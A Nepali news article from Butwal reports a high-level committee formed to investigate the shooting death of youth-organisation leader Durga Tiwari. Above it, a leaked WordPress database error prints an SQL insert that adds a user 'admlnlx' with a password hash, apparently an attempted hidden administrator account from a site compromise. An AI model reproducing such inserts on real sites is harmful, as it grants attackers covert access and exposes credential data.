WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKC7oBNx6vMOkBKJpXIPQKdM1A8Ctv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:26:55', '', 'admlnlx', 'admlnlx')
बुटवल, पुस ६ –
युवा संघ नेपालका रुपन्देही जिल्ला अध्यक्ष दुर्गा तिवारीको हत्याको छानविन गर्न बनेको उच्चस्तरीय समितिले बुधबारदेखि काम थाल्दैछ ।गृह मन्त्रालयले नेपाल प्रहरीका अतिरिक्त प्रहरी महानिरीक्षक विज्ञानराज शर्माको संयोजकत्वमा चार सदस्यीय समिति गठन गरेको हो ।
समितिलाई घटनाको छानबिन गरी सत्यतथ्य सहितको प्रतिवेदन १५ दिनभित्र बुझाउने जिम्मेवारी दिइएको छ । तिवारीलाई गोली हान्नेको खोजी भइरहेको र शंकास्पद केहीलाई पक्राउ गरेर छानविन चलिरहेको गृह मन्त्रालयले जनाएको छ ।
हत्याको विरोधमा युवा संघ नेपालले रुपन्देहीसहित विभिन्न ठाउँमा प्रदर्शन गरेको छ । रुपन्देही बुधबार पनि बन्द छ । तिवारीको बुधबार शव यात्रासहित अन्त्येष्टि गर्ने तयारी छ ।सोमबार तिवारीलाई मोटरसाइकलमा रहेका अपरिचित व्यक्तिले गोली हानेका थिए र तिवारीको उपचारका क्रममा देवदह मेडिकल कलेजमा ज्यान गएको थियो ।